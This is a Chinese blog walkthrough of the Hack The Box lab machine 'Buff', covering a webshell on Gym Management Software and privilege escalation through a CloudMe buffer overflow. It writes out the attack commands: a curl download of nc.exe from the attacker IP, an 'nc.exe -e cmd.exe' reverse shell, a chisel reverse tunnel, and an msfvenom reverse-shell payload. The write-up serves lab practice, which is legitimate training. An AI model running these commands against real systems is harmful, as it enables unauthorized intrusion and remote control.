【Hack The Box】windows练习-- Buff

最新推荐文章于 2024-10-17 09:47:46 发布
最新推荐文章于 2024-10-17 09:47:46 发布
阅读量622 收藏
点赞数
分类专栏: Hack The Box 文章标签: windows php apache web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127696349
版权

HTB 学习笔记

【Hack The Box】windows练习-- Buff

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月4日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
|_http-open-proxy: Proxy might be redirecting requests

在这里插入图片描述我姑且认为这是一个用户名,然后还发现了一个可能是版本信息的东西

mrb3n
Made using Gym Management Software 1.0

去谷歌搜了一下
在这里插入图片描述登陆绕过失败,绕过不了
在这里插入图片描述但是它同时也说了存在一个upload目录可以绕过拿到webshell

目录爆破

在这里插入图片描述我也确实扫出来了,但是不允许访问
在这里插入图片描述那就先过,因为这是一个apache的站,所以我着重扫描了一下php的存在
在这里插入图片描述发现的几个东西都没有啥东西,bp抓包分析了一下也不行
在这里插入图片描述

webshell

其实很奇怪,为什么谷歌没有搜到这个py脚本呢
在这里插入图片描述直接执行即可,别忘了最后的/
在这里插入图片描述反弹一个shell回来

curl http://10.10.14.20/nc.exe -o nc.exe
nc.exe -e cmd.exe 10.10.14.20 1234

提权

在这里插入图片描述然后几个常用的枚举都不行,内核简单看来也没啥东西
那就分析一下服务

服务信息枚举

netstat -ano | findstr TCP | findstr ":0"

在这里插入图片描述发现一个8888非常显眼,我一度以为是我开的
因为我真的很想发财
在这里插入图片描述

tasklist /v | findstr 7400
用下面这个命令全局搜索
for /r c:/ %i in (CloudMe*) do @echo %i
然后找到了这个文件

在这里插入图片描述

抓紧时间,因为会错过

然后把这个玩意放到search里搜索一下,发现是个缓冲区溢出
在这里插入图片描述但是那个程序是本地开放的,并且windows里有也没有python
只能做个隧道

隧道搭建

./chisel_1.6.0_linux_amd64 server -p 8000 --reverse
./chisel.exe client 10.10.14.13:8000 R:8888:localhost:8888

在这里插入图片描述
在这里插入图片描述

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload

在这里插入图片描述

在这里插入图片描述
然后直接用就行了
在这里插入图片描述

人间体佐菲
关注
专栏目录
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
hackthebox-buff(gym渗透 & 端口转发& cloudme 缓冲区溢出 )
冬萍子癸水
01-17 1195
1、扫描 masscan快速全局扫,nmap具体扫。7680不知道,8080是web进去搜集信息。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.198 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-17 09:36:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send
Hack the box靶机 Buff
菜浪马废的博客
09-21 507
Gym Management Software 1.0 搜了一下漏洞 发现有可用的48506
Hack The Box -----------------------Active
大方子
12-16 6983
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
Hack The Box - Curling Writeup
qq_23026851的博客
02-02 1728
获得这个box的user很容易,root.txt也其实不难,但是如何获得root shell还有待研究。总之,先记录下过程。 用Nmap + Nikto对目标机进行扫描。 系统用的是Joomla! 3.8.8,且发现了admin登陆页面/administrator/index.php。不需要exploit这个界面,因为80端口上的网页源代码中提示了有secret.txt。 Base64解码后...
hack the box (web)
m0_38094687的博客
04-08 5440
接下来是2道web水题,来自hack the box。这个网站还真是厉害啊,邀请码要靠自己破解网页的一个小trick。话不多说看题。 - Cartographer (30) - HDC (30) Cartographer sql注入大水题 使用username='='&password='='的方式绕过 访问一下info=flag即可得到 HDC 这题...
hack-browser-data-windows-64bit
05-12
这款工具支持多种主流浏览器,如 Chrome、Firefox、Edge、360、QQ、Brave 等,并且可以在 Windows、macOS 和 Linux 系统上运行。 安装和使用:对于 Windows 系统,安装过程非常简单。用户只需下载适用于 Windows 64...
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
【标题】"HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作"涉及的是一个网络安全领域的活动,其中“HackTheBox”是一个知名的在线平台,它提供了模拟黑客攻击的环境来提升安全专业人员的技能。CTF(Capture The Flag...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
Hack the box 上线最新炫酷功能
neal1991的专栏
05-22 1444
今天群友有人提醒 Hack the box 上线了最新的 Pwnbox,上去体验了一把,非常炫酷。Pwnbox 提供了 ssh 终端连接,以及浏览器客户端的 VNC 端,使用体验不错,这...
笔试强训day37
2301_79420799的博客
10-11 496
的矩阵,矩阵中的数字表示滑雪场各个区域的高度,你可以选择从任意一个区域出发,并滑向任意一个周边的高度严格更低的区域(周边的定义是上下左右相邻的区域)。给定两字符串A和B,如果能将A从中间某个位置分割为左右两部分字符串(可以为空串),并将左边的字符串移动到右边字符串后面组成新的字符串可以变为字符串B时返回true。再如:如果A=‘abcd’,B=‘abcd’,A切成‘abcd’和’'(空串),换位后可以得到B,返回true。≤100 ,矩阵中的数字满足 1≤val≤1000 1≤。),空间复杂度 O(n)
【C++】拆分详解 - list
bubble_shadow的博客
10-14 806
底层是带头双向链表结构,需要额外空间保存节点信息(对于存储类型较小元素的大list来说这可能是一个重要的因素)在常数范围内支持任意位置的插入和删除,效率通常优于array、vector和deque。不支持随机访问,必须从头/尾开始找,访问特定元素需要线性时间。
C++——反向迭代器
2301_80342122的博客
10-11 861
list没有访问到第一个值,而且访问了哨兵位,是随机值。但实际上,这只是另外一种实现方式,它拥有自己的优势。复用已经实现的迭代器实现反向迭代器。乍看库中的实现,vector会越界。为避免上述情况,在其中访问元素时,使用正向迭代器适配出反向迭代器。也可以修改,但要重载运算符。,而且在意义上是不建议重载的。此时出现了问题,编译不通过。
Java中集合类型的转换
qq_56438516的博客
10-11 542
在Java编程中,集合框架(Collections Framework)提供了一套用于存储和处理对象集合的接口和类。由于集合框架的灵活性和强大功能,我们经常需要在不同的集合类型之间进行转换。本文将介绍Java中常见的集合类型转换方法,包括从List到Set,从Set到List,以及Map的键和值的转换。
【C++】——list 容器的解析与极致实现
2402_82668782的博客
10-15 1702
人的一切痛苦,本质上都是对自己的无能的愤怒。—— 王小波是C++(STL)中的一个成员,其。不同于连续的、紧密排列的数组容器,List容器的内部是由双向链表构成的,使得它在插入和删除操作上,就如同行云流水一般顺畅,不需移动其它元素。环状链表的尾是一个空节点,符合“左闭右开”区间。需要频繁进行插入和删除操作的场合。更多地需要随机访问元素。
【OSCP Proving Grounds 靶场系列】Slort
Eason_LYC安全白帽子的成长博客
10-14 388
【OSCP Proving Grounds 靶场系列】Slort
宠物医院收银系统源码
最新发布
qh716的博客
10-17 212
宠物医院收银系统源码
【信息安全管理与评估】2023年全国职业院校技能大赛赛题第05套
Play_Sai的博客
10-16 902
集团、分公司的网络结构详见拓扑图。取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)。A 集团的CentOS 服务器被黑客入侵,该服务器的 Web 应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值